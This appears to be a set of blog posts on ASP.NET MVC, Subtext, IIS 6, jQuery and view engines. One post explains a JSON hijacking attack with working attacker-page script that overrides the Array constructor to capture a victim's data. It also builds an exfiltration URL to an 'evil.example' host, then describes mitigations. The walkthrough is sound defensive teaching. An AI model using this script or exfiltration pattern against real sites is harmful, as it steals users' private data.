
I’m trying to keep our internal release notes up to date so that I don’t face a huge pile of work when we’re finally ready to release. Yes, I’m always trying something new; today I’m giving procrastination the boot.

These notes were sent to me by Jacques, a developer on the ASP.NET MVC feature team. I only cleaned them up slightly.

The sections below contain descriptions and possible solutions for known issues that may cause the installer to fail. The solutions have proven successful in most cases.

Visual Studio Add-ins

The ASP.NET MVC installer may fail when certain Visual Studio add-ins are already installed. The final steps of the installation install and configure the MVC templates in Visual Studio. If the installer encounters a problem during these steps, the installation is aborted and rolled back. To produce a log file, MVC can be installed from a command prompt using msiexec as follows:

msiexec /i AspNetMVCBeta-setup.msi /q /l*v mvc.log

If an error occurred, the log file will contain an error message similar to the example below.

MSI (s) (C4:40) [20:45:32:977]: Note: 1: 1722 2: VisualStudio_VSSetup_Command 3: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe 4: /setup

MSI (s) (C4:40) [20:45:32:979]: Product: Microsoft ASP.NET MVC Beta – Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup


This error is usually accompanied by a corresponding event that will be logged in the Windows Event Viewer:

Faulting application devenv.exe, version 9.0.30729.1, time stamp 0x488f2b50, faulting module unknown, version, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x006c0061, process id 0x10e0, application start time 0x01c9355ee383bf70

In most cases, removing the add-ins before installing MVC, and then reinstalling the add-ins, will resolve the problem. ASP.NET MVC installations have been known to run into problems when the following add-ins were already installed:

  • PowerCommands
  • Clone Detective

Cryptographic Services

In a few isolated cases, the Windows Event Viewer may contain an Error event with event source CAPI2 and event ID 513. The event message will contain the following: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

A knowledge base article describes various steps a user can take to correct the problem, but in some cases simply stopping and restarting the Cryptographic Services service should allow the installation to proceed.


A Subtext user found a security flaw which opens up Subtext to potential XSS attacks via comments. This flaw was introduced in Subtext 2.0 by the feature which converts URLs to anchor tags. If you are still on 1.9.5b or before, you are not affected by this issue. If you upgraded to 2.0, then please update to 2.1 as soon as you can.

Note that if someone attempts to abuse your comments, you can edit them in the admin section of your blog to fix the problem.

This release has several other bug fixes and usability improvements as well. I started to replace the use of UpdatePanel in some areas with straight up jQuery, which ends up reducing bandwidth usage.

List of bug fixes and changes:

  • Fixed Medium Trust issue by removing calls to UrlAuthorizationModule.CheckUrlAccessForPrincipal which is not allowed from medium trust.
  • Removed email address from RSS feed by default and added Web.config setting to change this in order to protect against spamming.
  • Upgraded Jayrock assembly to fix the issue with VerificationException being thrown.
  • Fixed code which strips HTML from comments when displaying recent comments. Certain cases would cause CPU spike.
  • Fixed Remember Me functionality for the OpenID login.
  • Fixed a bug with adding categories in which an error was displayed, even though the category was added correctly.
  • Fixed a bug in the code to convert URLs to anchor tags.
  • Upgraded jQuery to version 1.2.6.
  • Improved the timezone selection UI with jQuery.

I was the one who implemented the feature at fault. Unfortunately the way the feature was written made it such that it reversed earlier scrubbing of the HTML due to a mistake in how I used SgmlReader. I apologize for the mistake. It won’t happen again.

Many thanks go out to Adrian Bateman for pointing out the bug and the fix.

Notes for new installations

The install package includes a default Subtext2.1.mdf file for SQL 2005 Express. If you plan to run your blog off of SQL Server Express, installation is as easy as copying the install files to your Web Root. If you’re not using SQL Express, but plan to use SQL Server 2005, you can attach to the supplied .mdf file and use it as your database.

Notes for upgrading

Feel free to delete the database files in the App_Data folder of the install package; they only apply to new installs. Subtext 2.1 does not have any schema changes, so upgrading should be smooth.

Full upgrade instructions are on the Subtext project website.

Download it here. Note that the file is the one you want to use to upgrade your site. The other file contains the source in case you want to build the solution.


How many of you out there who use Subtext host it on a hosting provider who does not have ASP.NET 3.5 available? I’d like to make the next version of Subtext 2 take a dependency on 3.5. Note that it wouldn’t have to take a dependency on SP1. Just ASP.NET 3.5 proper as I believe most hosting providers support it.

If you’re stuck with a hosting provider who only supports ASP.NET 2.0 and not 3.5, do leave a comment.

Note that we’re still in the planning stages for Subtext 3, which will be built on ASP.NET MVC. In the meantime, I still plan to update Subtext 2.*. In fact, much of the work we will do for Subtext 3 may be prototyped in 2.* and ported over.

UPDATE: If you run ASP.NET MVC on IIS 6 with ASP.NET 4, setting up extensionless URLs just got easier. In most cases, it should just work.

I’ve seen a lot of reports where people have trouble getting ASP.NET MVC up and running on IIS 6. Sometimes the problem is a very minor misconfiguration, sometimes it’s a misunderstanding of how IIS 6 works.

In this post, I want to provide a definitive guide to getting ASP.NET MVC running on IIS 6. I will walk through using the .mvc or .aspx file extension for URLs first, and then walk through using extension-less URLs.

If you’re running into problems with IIS 6 and ASP.NET MVC, I recommend trying to walk through all the steps in this post, even if you’re not interested in using the .mvc or .aspx mapping. Some of the lessons learned here have more to do with how ASP.NET itself works with IIS 6 than anything specific to ASP.NET MVC.

Initial Setup

To make this easy, start Visual Studio and create a new ASP.NET MVC Web Application Project on the machine with IIS 6. If IIS 6 is on a different machine, you can skip this step; we can deploy the site to the machine later.

After you create the project, right click the project and select Properties. The project properties editor will open up. Select the Web tab and select Use IIS Web Server. Click on the image for a full size view.

Project Properties

In the project URL, I gave it a virtual application name of Iis6DemoWeb and then checked Create Virtual Directory. A dialog box should appear and you should now have an IIS virtual application (note this is different from a virtual directory, as indicated by the gear-looking icon) under your Default Web Site.

IIS 6 Virtual Web

Using a URL File Extension

When you run the ASP.NET MVC installer, it will set up an ISAPI mapping in IIS 6 to map the .mvc extension to the aspnet_isapi.dll. This is necessary in order for IIS to hand off requests using the .mvc file extension to ASP.NET.

If you’re planning to use extension-less URLs, you can skip this section, but it may be useful to read anyways as it has some information you’ll need to know when setting up extension-less URLs.

Mapping .mvc to ASP.NET

If you plan to use the .mvc URL extension, and are going to deploy to IIS 6 on a machine that does not have ASP.NET MVC installed, you’ll need to create this mapping by performing the following steps.

One nice benefit of using the .aspx extension instead of .mvc is that you don’t have to worry about mapping the .aspx extension. It should already be mapped assuming you have ASP.NET installed properly on the machine.

For the rest of you, start by right clicking on the Virtual Application node (IIS6DemoWeb in this case) and select Properties. You should see the following dialog.


Make sure you’re on the Virtual Directory tab and select Configuration. Note that you can also choose to make this change on the root website, in which case the tab you’re looking for is Home Directory not Virtual Directory.

This will bring up the Application Configuration dialog which displays a list of ISAPI mappings. Scroll down to see if .mvc is in the list.


In the screenshot, you can see that .mvc is in the list. If it is in the list on your machine, you can skip ahead to the next section. If it’s not in the list for you, let’s add it to the list. You’re going to need to know the path to the aspnet_isapi.dll first. On my machine, it is:


It might differ on your machine. One easy way to find out is to find the .aspx extension in the list and double click it to bring up the mapping dialog.


Now you can copy the path in the Executable text box to your clipboard. This is the path you’ll want to map .mvc to.

Click Cancel to go back to the Application Configuration dialog and then click Add, which will bring up an empty Add/Edit Application Extension Mapping dialog.

Fill in the fields with the exact same values as you saw for .aspx, except the extension should be “.mvc” without the quotes. Click OK and you’re done with the mapping.

Specifying Routes with an Extension

Before we run the application, we need to update the default routes to look for the file extension we chose, whether it be the .mvc or .aspx extension. Here is the RegisterRoutes method in my Global.asax.cs file using the .mvc extension. If you want to use the .aspx extension, just replace {controller}.mvc with {controller}.aspx.

public static void RegisterRoutes(RouteCollection routes)
{
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

    routes.MapRoute(
        "Default",
        "{controller}.mvc/{action}/{id}",
        new { action = "Index", id = "" }
    );

    routes.MapRoute(
        "Root",
        "",
        new { controller = "Home", action = "Index", id = "" }
    );
}

Note that because the second route, “Default”, has a literal extension as part of the URL segment, it cannot match a request for the application root. That’s why I have a third route named “Root” which can match requests for the application root.

Now, I can hit CTRL+F5 (or browse my website) and I should see the following home page.


And about page.


Notice that the URLs contain the .mvc extension.

Uh oh, Houston! We have a problem

Of course, you’re going to want to be able to navigate to the web root for your project. Notice what happens when you navigate to /Iis6DemoWeb.

Root Home

This is a bug in the Default.aspx.cs file included with our default template which I discovered as I was writing this walkthrough. We’ll fix it right away, but I can provide the fix here as it’s insanely easy.

Note: If you received a File Not Found error when visiting the root, then you might not have Default.aspx mapped as a default document. Follow these steps to add Default.aspx as a default document.

As I’ve written before, this file is necessary for IIS 6, IIS 7 Classic Mode, and pre SP1 Cassini, but not IIS 7 Integrated. So if you’re using Cassini with Visual Studio 2008 SP1 and deploying to IIS 7 Integrated, you can delete Default.aspx and its sub-files.

In the meanwhile, the fix is to make the following change.




HttpContext.Current.RewritePath(Request.ApplicationPath, false);

If you created your website in the IIS root rather than a virtual application, you would never have noticed this issue. But in a virtual application, the rendered URL to the stylesheet contained the virtual application name, when it shouldn’t have. Changing the second argument to false fixes this.

IIS6 Extension-less URLs

Ok, now we’re ready to try this with extension-less URLs using the infamous “Star mapping” or “Wildcard mapping” feature of IIS 6. I say infamous because there is a lot of concern over the performance implications of doing this. Of course, you should measure the performance of your site for yourself to determine if it is really a problem.

The first step is to go back to the Application Configuration Properties dialog like we did when configuring the .mvc ISAPI mapping (see, I told you that information might come in useful later).


Next to the Wildcard application maps section, click the Insert… button.

wildcard extension

This brings up the wildcard application mapping dialog. Enter the path to the aspnet_isapi.dll. You can follow the trick we mentioned earlier for getting this path.

Don’t forget to uncheck the Verify that file exists checkbox! This is one of the most common mistakes people make.

If you’ve been following along with everything in this post, you’ll need to go back and reset the routes in your Global.asax.cs file to the default routes. You no longer need the .mvc file extension in the routes. At this point, you can also remove Default.aspx if you’d like; it’s not needed.

Now when you browse your site, your URLs will not have a file extension as you can see in the following screenshots.

Home page without

About page without


Final Tips

One thing to understand is that an ASP.NET project is scoped to the Website or Virtual Application in which it resides. For example, in the example I have here, we pointed a Virtual Application named IIS6DemoWeb to the directory containing my ASP.NET MVC web application.

Thus, only requests for that virtual application will be handled by my web application. I cannot make a request for http://localhost/ in this case and expect it to be handled by my application. Nor can I expect routing in this application to handle requests for another root directory such as http://localhost/not-my-app/.

This might seem like an obvious thing to say, but I know it trips some people up. Also, in the example I did here, I used a virtual application for demonstration purposes. It’s very easy to point a root Website in IIS to my application and run it at http://localhost/ rather than in a virtual application. This is not a problem. I hope you found this helpful.

As I mentioned before, I’m really excited that we’re shipping jQuery with ASP.NET MVC and with Visual Studio moving forward. Just recently, we issued a patch that enables jQuery Intellisense to work in Visual Studio 2008.

But if you’re new to jQuery, you might sit down at your desk ready to take on the web with your newfound JavaScript light saber, only to stare blankly at an empty screen asking yourself, “Is this it?”

See, as exciting and cool as jQuery is, it’s really the vast array of plugins that gives jQuery its star power. Today I wanted to play around with integrating two jQuery plugins: the jQuery Form Plugin, used to submit forms asynchronously, and the jQuery Validation plugin, used to validate input.

Since this is a prototype for something I might patch into Subtext, which still targets ASP.NET 2.0, I used Web Forms for the demo, though what I do here easily applies to ASP.NET MVC.

Here are some screenshots of it in action. When I click the submit button, it validates all the fields. The email field is validated after the input loses focus.


When I correct the data and click “Send Comment”, it will asynchronously display the posted comment.


Let’s look at the code to make this happen. Here’s the relevant HTML markup in my Default.aspx page:

<div id="comments" ></div>

<form id="form1" runat="server">
<div id="comment-form">
    <asp:Label AssociatedControlID="title" runat="server" Text="Title: " />
    <asp:TextBox ID="title" runat="server" CssClass="required" />
    <asp:Label AssociatedControlID="email" runat="server" Text="Email: " />
    <asp:TextBox ID="email" runat="server" CssClass="required email" />
    <asp:Label AssociatedControlID="body" runat="server" Text="Body: " />
    <asp:TextBox ID="body" runat="server" CssClass="required" />
  <input type="hidden" name="<%= submitButton.ClientID %>" 
    value="Send Comment" />
  <asp:Button runat="server" ID="submitButton" 
    OnClick="OnFormSubmit" Text="Send Comment" />
</div>
</form>

I’ve called out a few important details in code. The top DIV is where I will put the response of the AJAX form post. The CSS classes on the elements provide validation meta-data to the Validation plugin. What the heck is that hidden input doing there?

Notice that hidden input that duplicates the field name of the submit button. That’s the ugly hack part I did. The jQuery Form plugin doesn’t actually submit the value of the input button. I needed that to be submitted in order for the code behind to work. When you click on the submit button, a method named OnFormSubmit gets called in the code behind.

Let’s take a quick look at that method in the code behind.

protected void OnFormSubmit(object sender, EventArgs e) {
    var control = Page.LoadControl("~/CommentResponse.ascx") 
        as CommentResponse;
    control.Title = title.Text;
    control.Email = email.Text;
    control.Body = body.Text;

    var htmlWriter = new HtmlTextWriter(Response.Output);
    control.RenderControl(htmlWriter);
    Response.End();
}

Notice here that I’m just instantiating a user control, setting some properties of the control, and then rendering it to the output stream. I’m able to access the values in the submitted form by accessing the ASP.NET controls.

This is sort of like the Web Forms equivalent of ASP.NET MVC’s partial rendering ala the return PartialView() method. Here’s the code for that user control.

<%@ Control Language="C#" CodeBehind="CommentResponse.ascx.cs" 
    Inherits="WebFormValidationDemo.CommentResponse" %>
<div style="color: blue; border: solid 1px brown;">
        Thanks for the comment! This is what you wrote.
        <label>Title:</label> <%= Title %>
        <label>Email:</label> <%= Email %>
        <label>Body:</label> <%= Body %>
</div>

Along with its code behind.

public partial class CommentResponse : System.Web.UI.UserControl {
    public string Title { get; set; }
    public string Email { get; set; }
    public string Body { get; set; }
}

Finally, let’s look at the script in the head section that ties this all together and makes it work.

<script src="scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script src="scripts/jquery.validate.js" type="text/javascript"></script>
<script src="scripts/jquery.form.js" type="text/javascript"></script>
<% if (false) { %>
<script src="scripts/jquery-1.2.6-vsdoc.js" type="text/javascript"></script>
<% } %>
<script type="text/javascript">
    $(document).ready(function() {
        $("#<%= form1.ClientID %>").validate({
            submitHandler: function(form) {
                $(form).ajaxSubmit({
                    target: "#comments"
                });
            }
        });
    });
</script>
The if (false) section is for the jQuery IntelliSense, which only matters to me at design time, not runtime.

What we’re doing here is getting a reference to the form and calling the validate method on it. This sets up the form for validation based on validation metadata stored in the CSS classes for the form inputs. It’s possible to do this completely externally, but one nice thing about this approach is that you can now style the fields based on their validation attributes.

We then register the ajaxSubmit method of the jQuery Form plugin as the submit handler for the form. So when the form is valid, it will use the ajaxSubmit method to post the form, which posts it asynchronously. In the arguments to that method, I specify the #comments selector as the target of the form. So the response from the form submission gets put in there.

As I mentioned before, the hidden input just ensures that ASP.NET runs its lifecycle in response to the form post so I can handle the response in the button’s event handler. In ASP.NET MVC, you’d just point this to an action method instead and not worry about adding the hidden input.

In any case, play around with these two plugins as they provide way more rich functionality than what I covered here.

I recently learned about a very subtle potential security flaw when using JSON. While subtle, it was successfully demonstrated against GMail a while back. The post, JSON is not as safe as people think it is, covers it well, but I thought I’d provide step-by-step coverage to help make it clear how the exploit works.

The exploit combines Cross Site Request Forgery (CSRF) with a JSON Array hack allowing an evil site to grab sensitive user data from an unsuspecting user. The hack involves redefining the Array constructor, which is totally legal in JavaScript.
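Before walking through the attack, it’s worth seeing how small the trick is. Here’s a minimal sketch in plain JavaScript (runnable in Node; the variable names are my own) showing that reassigning Array is legal, and also why modern engines blunt the attack: an array literal no longer invokes the overridden constructor, only an explicit new Array() call does.

```javascript
var captured = null;

// Redefining the global Array constructor is perfectly legal JavaScript.
Array = function () {
  captured = this;
};

// An explicit construction call runs our replacement function...
var viaNew = new Array();
console.log(captured === viaNew); // prints true

// ...but in modern engines an array literal does NOT invoke the
// overridden constructor, which is exactly why this exploit no
// longer works against current browsers.
captured = null;
var viaLiteral = [1, 2, 3];
console.log(captured === null); // prints true in modern engines
```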

Let’s walk through the attack step by step. Imagine that you’re logged in to a trusted site. The site makes use of JavaScript which makes GET requests to a JSON service:

GET: /demos/secret-info.json

that returns some sensitive information:

["Philha", "my-confession-to-crimes", 7423.42]

Now you need to be logged in to get this data. If you go to a fresh browser and type in the URL to /demos/secret-info.json, you’ll get redirected to a login page (in my demo, that’s not the case. You’ll have to trust me on this).

But now suppose you accidentally visit an evil site which has the following scripts in the <head /> section. Notice the second script references the JSON service on the good site.

<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="" 
  type="text/javascript"></script>

<script type="text/javascript">
  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>
When you visit the page, you will see the following alert dialog…

evil alert message

…which indicates that the site was able to steal your data.

How does this work?

There are two key parts to this attack. The first is that although browsers stop you from being able to make cross-domain HTTP requests via JavaScript, you can still use the src attribute of a script tag to reference a script in another domain and the browser will make a request and load that script.

The worst part of this is that the request for that script file is being made by your browser with your credentials. If your session on that site is still valid, the request will succeed and now your sensitive information is being loaded into your browser as a script.

That might not seem like a problem at this point. So what if the data was loaded into the browser. The browser is on your machine and a JSON response is not typically valid as the source for a JavaScript file. For example, if the response was…

{"d": ["Philha", "my-confession-to-crimes", 7423.42]}

…pointing a script tag to that response would cause an error in the browser. So how’s the evil guy going to get the data from my browser to his site?

Well, it turns out that returning a JSON array is valid as the source for a JavaScript script tag. But the array isn’t assigned to anything, so it would evaluate and then get discarded, right? What’s the big deal?

That’s where the second part of this attack comes into play.

var secrets;
Array = function() {
  secrets = this;
};

JavaScript allows us to redefine the Array constructor. In the evil script above, we redefine the array constructor and assign the array to a global variable we defined. Now we have access to the data in the array and can send it to our evil site.

In the sample I posted above, I just wrote out an alert. But it would be very easy for me to simply document.write a 1 pixel image tag where the URL contains all the data in the JSON response.
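For illustration, the payload delivery could look like the sketch below. The evil.example host and /steal endpoint are made up for this example; the point is that the stolen values get encoded into an image URL, so the browser ships the data off in an ordinary GET request.

```javascript
// Hypothetical exfiltration endpoint; evil.example/steal is made up.
function buildExfiltrationUrl(stolenValues) {
  var data = stolenValues.join(' ');
  return 'http://evil.example/steal?data=' + encodeURIComponent(data);
}

var url = buildExfiltrationUrl(['Philha', 'my-confession-to-crimes', 7423.42]);
console.log(url);

// In a real attack, the page would then emit something like:
//   document.write('<img src="' + url + '" width="1" height="1" />');
// and the attacker reads the data out of his server's request logs.
```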


One common mitigation is to make sure that your JSON service always returns its response as a non-array JSON object. For example, with ASP.NET Ajax script services, they always append a “d” property to the response, just like I demonstrated above. This is described in detail in this quickstart:

The ASP.NET AJAX library uses the “d” parameter formatting for JSON data. This forces the data in the example to appear in the following form:

{"d" : ["bankaccountnumber", "$1234.56"] }

Because this is not a valid JavaScript statement, it cannot be parsed and instantiated as a new object in JavaScript. This therefore prevents the cross-site scripting attack from accessing data from AJAX JSON services on other domains.

The Microsoft Ajax client libraries automatically strip the “d” out, but other client libraries, such as jQuery, would have to take the “d” property into account when using such services.
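You can see both halves of this mitigation in a few lines of plain JavaScript (a sketch using eval to stand in for the browser loading a script tag, with the sample values from the quickstart above). A bare JSON array evaluates fine as a script, while the "d" wrapper is a syntax error as a statement because the braces parse as a block; a legitimate client instead parses the response and unwraps the "d" property itself.

```javascript
// A bare JSON array is a valid JavaScript expression statement...
var asArray = eval('["bankaccountnumber", "$1234.56"]');
console.log(asArray.length); // prints 2

// ...but the same data wrapped in {"d": ...} is NOT valid as a
// statement: the braces are parsed as a block, so a <script> tag
// pointing at such a response simply fails with a syntax error.
var failed = false;
try {
  eval('{"d": ["bankaccountnumber", "$1234.56"]}');
} catch (e) {
  failed = e instanceof SyntaxError;
}
console.log(failed); // prints true

// A legitimate client parses the response and unwraps "d" itself.
var response = JSON.parse('{"d": ["bankaccountnumber", "$1234.56"]}');
var values = response.d;
console.log(values[0]); // prints bankaccountnumber
```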

Another potential mitigation, one that ASP.NET Ajax services do by default too, is to only allow POST requests to retrieve sensitive JSON. Since the script tag will only issue a GET request, a JSON service that only responds to POST requests would not be susceptible to this attack, as far as I know.

For those that keep track, this is why I asked on Twitter recently how many use GET requests to a JSON endpoint.

How bad is this?

It seems like this could be extremely bad as not many people know about this vulnerability. After all, if GMail was successfully exploited via this vulnerability, who else is vulnerable?

The good news is that it seems to me that most modern browsers are not affected by this. I have a URL you can click on to demonstrate the exploit, but you have to use Firefox 2.0 or earlier to get the exploit to work. It didn’t work with IE 6, 7, or 8, Firefox 3, or Google Chrome.

Take this all with a grain of salt of course because there may be a more sophisticated version of this exploit that does work with modern browsers.

So the question I leave to you, dear reader, is given all this, is it acceptable to you for a JSON service containing sensitive data to require a POST request to obtain that data, or would that inspire righteous RESTafarian rage?

Pop quiz. What would you expect these three bits of HTML to render?

<!-- no new lines after textarea -->
<textarea>Foo</textarea>

<!-- one new line after textarea -->
<textarea>
Foo</textarea>

<!-- two new lines after textarea -->
<textarea>

Foo</textarea>

The fact that I’m even writing about this might make you suspicious of your initial gut answer. Mine would have been that the first would render a text area with “Foo” on the first line, the second with it on the second line, and the third with it on the third line.

In fact, here’s what it renders using Firefox 3.0.3. I confirmed the same behavior with IE 8 beta 2 and Google Chrome.

three text

Notice that the first two text areas are identical. Why is this important?

Suppose you’re building an ASP.NET MVC website and you call the following bit of code:

<%= Html.TextArea("name", "\r\nFoo") %>

You probably would expect to see the third text area in the screenshot above in which “Foo” is rendered on the second line, not the first.

However, suppose our TextArea helper didn’t factor in the actual behavior that browsers exhibit. You would in this case get the behavior of the second text area in which “Foo” is still on the first line.
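To make the difference concrete, here’s a sketch in JavaScript (not the helper’s actual C#, and with a deliberately simplified signature) of a naive renderer next to one that compensates for the browser swallowing the first newline after the opening tag:

```javascript
// Naive: given the value "\r\nFoo", the browser eats the newline
// right after <textarea>, so Foo renders on the FIRST line.
function renderTextAreaNaive(name, value) {
  return '<textarea name="' + name + '">' + value + '</textarea>';
}

// Compensating: always emit one extra newline after the opening tag.
// The browser swallows that one, so the supplied value renders as-is.
function renderTextArea(name, value) {
  return '<textarea name="' + name + '">\r\n' + value + '</textarea>';
}

console.log(JSON.stringify(renderTextAreaNaive('name', '\r\nFoo')));
console.log(JSON.stringify(renderTextArea('name', '\r\nFoo')));
```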

Fortunately, our TextArea helper does factor this in and renders the supplied value on the next line after the textarea tag. In my mind, this is very much an edge case, but it was reported as a bug by someone external a while back. Isn’t HTML fun?! ;)

One of the relatively obscure features of ASP.NET MVC view rendering is that you can render a single view using multiple view engines.

Brad Wilson actually mentioned this in his monster blog post about Partial Rendering and View Engines in ASP.NET MVC, but the implications may have been lost amongst all that information provided.

One of the best features of this new system is that your partial views can use a different view engine than your views, and it doesn’t require any coding gymnastics to make it happen. It all comes down to how the new view system resolves which view engine renders which views.

Let’s dig into a brief example of this in action to understand the full story. Lately, I’ve been playing around with the Spark view engine and really like what I see there. Unlike NHaml, which pretty much gets rid of all angle brackets via a terse DSL for generating HTML, Spark takes the approach that HTML itself should be the “language” for defining the view.

This is not to say that one is specifically better than the other, I’m just highlighting the difference between the two.

Let’s take a look at a small snippet of Spark markup:

  <li each='var p in ViewData.Model.Products'>
    ${p.Name} ${Html.ActionLink("Edit Product", "Edit")}
  </li>

Notice that rather than embedding a for loop in the code, you apply the each attribute to a piece of markup to denote that it should be repeated. This is much more declarative than using code nuggets to define a for loop.

As a demonstration, I thought I would take the default ASP.NET MVC project template and within the Index.aspx view, I would render a partial using the Spark view engine.

After referencing the appropriate assemblies from the Spark project, Spark.dll and Spark.Mvc.dll, I registered the spark view engine in Global.asax.cs like so:

protected void Application_Start() {
    ViewEngines.Engines.Add(new SparkViewFactory());
}

I then created a small spark partial view…

<div class="spark-partial">
    <if condition='ViewData.ContainsKey("Title")'>
        <p>${ViewData["Title"]}</p>
    </if>
    <p>${Html.ActionLink("About Page", "About")}</p>
</div>

… and added it to the appropriate directory. I also added a bit of CSS to my default stylesheet in order to highlight the partial.


In my Index.aspx view, I added a call to the Html.RenderPartial helper method.

<p>This is a WebForm View.</p>
<p>But the bordered box below, is a partial rendered using Spark.</p>
<% Html.RenderPartial("SparkPartial"); %>

And the result…

spark partial view

When we tell the view to render the partial view named “SparkPartial”, ASP.NET MVC will ask each registered view engine, “Hey, yous happens to knows a partial who goes by the name of SparkPartial? I have some unfinished bidness wid this guy.”

Yes, our view infrastructure speaks like a low level mobster thug.

The first view engine that answers yes gets to render that particular view or partial view. The benefit of this is that if you create a partial view using one view engine, you can reuse that partial on another site that might use a different view engine as its default.

If you want to try out the demo I created, download it and give it a twirl. It is built against ASP.NET MVC Beta.

Quick question: what’s higher than a kite?

No, it’s not me nor Cheech and Chong. It’s a cloud!

Bad jokes (but funny video link) aside, Windows Azure, Microsoft’s foray into cloud computing, is getting a lot of attention right now. The basic idea behind cloud computing is you can host your application in the cloud and pay a monthly fee much like a utility such as paying for water and power.

The benefit is you don’t have to deal with the infrastructure work and maintenance and you get “elastic” scalability, meaning your application can dynamically scale to meet rising need without much work on your part. That’s the idea at least.

The Saturday evening before I left for the PDC, Eilon (lead dev for ASP.NET MVC) and I got together to try out ASP.NET MVC with the Azure Dev Fabric environment. This was something we promised to prototype for Jim Nakashima of the Azure team before the PDC, but were … ah … a little late to deliver. ;)

We had good reason as we had been pre-occupied with getting the Beta release out, but still felt bad for totally dropping the ball, hence the late Saturday night pair programming session.

It turned out that it didn’t take long to get the default ASP.NET MVC project template sample app running in the Dev Fabric, which Jim later posted to his blog. Unfortunately, we didn’t invite a QA person over that evening and didn’t test the entire site thoroughly. While the home and about page worked, the account pages requiring the Membership Provider didn’t. Doh!

Fortunately Jim recently updated the sample to now work with ASP.NET Providers running in the cloud and posted it to his blog. Even before Jim updated the sample we delivered to him, Aaron Lerch posted his own step by step guide to getting providers to work. Nice!

The sample project Jim posted has some fixes to the project that allow it to work in the actual cloud. There were a couple of minor bugs regarding rendering URLs with port numbers when using our form helpers (already fixed in our trunk) that would not affect most people, but does happen to affect running in the cloud.

mvc comments edit

I’ve heard a lot of concerns from people worried that the ASP.NET team will stop devoting resources and support to Web Forms in favor of ASP.NET MVC in the future. I thought I would try to address that concern in this post based on my own observations.

At the PDC, a few people explicitly told me, not without a slight tinge of anger, that they don’t get ASP.NET MVC and they like Web Forms just fine thank you very much. Hey man, that’s totally cool with me! Please don’t make me the poster boy for killing Web Forms. If you like Web Forms, it’s here to stay. ;)

I can keep telling you that we’re continuing to invest in Web Forms until my face is blue, but that probably won’t be convincing. So I will instead present the facts and let you draw your own conclusions.

ASP.NET Themes

If you watch the ASP.NET 4.0 Roadmap talk at PDC, you’ll see that there are five main areas of investment that the ASP.NET team is working on. I’ll provide a non-comprehensive brief summary of the five here.

Core Infrastructure

With our core infrastructure, we’re looking to address key customer pain points and improve scale and performance.

One feature towards this goal is cache extensibility which will allow plugging in other cache products such as Velocity as a cache provider. We’ll also enhance ASP.NET Session State APIs. There are other scalability investments I don’t even personally understand all too deeply. ;)

To learn more about our cache extensibility plans, check out this PDC talk by Stefan Schackow.

Web Forms

In Web Forms, we’re looking to address Client IDs, allowing developers to control the id attribute value rendered by server controls. We’re adding support for URL routing with Web Forms. We’re planning to improve ViewState management by providing fine-grained control over it. And we’re making investments in making our controls more CSS friendly. There are many other miscellaneous improvements to various controls we’re making that would require me to query and filter the bug database to list, and I’m too lazy to do that right now.
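To make the Client IDs item concrete, here is the kind of markup this feature is aimed at. (The ClientIDMode property sketched here is what eventually shipped in ASP.NET 4.0; the exact property name was not final at the time of this post.)

```aspx
<%-- With ClientIDMode="Static", the rendered id attribute is exactly
     "UserName" rather than an auto-generated ctl00_..._UserName id. --%>
<asp:TextBox ID="UserName" runat="server" ClientIDMode="Static" />
```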


Ajax

With Ajax, we’re implementing client side templates and data binding. Our team now owns the Ajax Control Toolkit so we’re looking at opportunities to possibly roll some of those server controls into the core framework. And of course, we’ve added jQuery to our offerings along with jQuery Intellisense.

To see more about our investments here, check out Bertrand Le Roy’s Ajax talk at PDC.

Data and Dynamic Data

In Dynamic Data (which technically could fall in the Web Forms bucket) we’re looking to add support for an abstract data layer which would allow for POCO scaffolding. We’re implementing many-to-many relationships, enhanced filtering, enhanced meta-data, and adding new field templates.

There’s a lot of cool stuff happening here. To get more details on this, check out Scott Hunter’s Dynamic Data talk at PDC.


ASP.NET MVC

We’re still working on releasing 1.0. In the future, we hope to leverage some of the Dynamic Data work in ASP.NET MVC.

Notice here that ASP.NET MVC is just one of these five areas we’re investing in moving forward. It’s not somehow starving our efforts in other areas.

Feature Sharing

One other theme I’d like to highlight is that when we evaluate new features, we try and take a hard look at how it fits into the entire ASP.NET architecture as a whole, looking both at ASP.NET MVC and ASP.NET Web Forms. In many cases, we can share the bulk of the feature with both platforms with a tiny bit of extra work.

For example, ASP.NET Routing was initially an ASP.NET MVC feature only, but we saw it could be more broadly useful and it was shared with Dynamic Data. It will eventually make its way into Web Forms as well. Likewise, Dynamic Data started off as a Web Forms specific feature, but much of it will make its way into ASP.NET MVC in the future.


It’s clear that ASP.NET MVC is getting a lot of attention in part because it is shiny and new, and you know how us geeks loves us some shiny new toys. Obviously, I don’t believe this is the only reason it’s getting attention, as there is a lot of goodness in the framework, but I can see how all this attention tends to skew perceptions slightly. To put it in perspective, let’s look at the reality.

Currently, ASP.NET MVC hasn’t even been released yet. While the number of users interested in and building on ASP.NET MVC is growing, it is clearly a small number compared to the number of Web Form developers we have.

Meanwhile, we have millions of ASP.NET developers productively using Web Forms, many of whom are just fine with the Web Form model as it meets their needs. As much as I love the ASP.NET MVC way of doing things, I understand it doesn’t suit everyone, nor every scenario.

So with all this investment going on, I hope it’s clear that we are continuing to invest in Web Forms along with the entire ASP.NET framework.

code comments edit

UPDATE: I added three new unit tests and one interesting case in which the three browsers render the same markup differently.

Well I’m back at it, but this time I want to strip all HTML from a string. Specifically:

  • Remove all HTML opening and self-closing tags: Thus <foo> and <foo /> should be stripped.
  • Remove all HTML closing tags such as </p>.
  • Remove all HTML comments.
  • Do not strip any text in between tags that would be rendered by the browser.

This may not sound all that difficult, but I have a feeling that many existing implementations out there would not pass the set of unit tests I wrote to verify this behavior.

I’ll present some pathological cases to demonstrate some of the odd edge cases.

We’ll start with a relatively easy one.

<foo title=">" />

Notice that this tag contains the closing angle bracket within an attribute value. That closing bracket should not close the tag. Only the one outside the attribute value should close it. Thus, the method should return an empty string in this case.
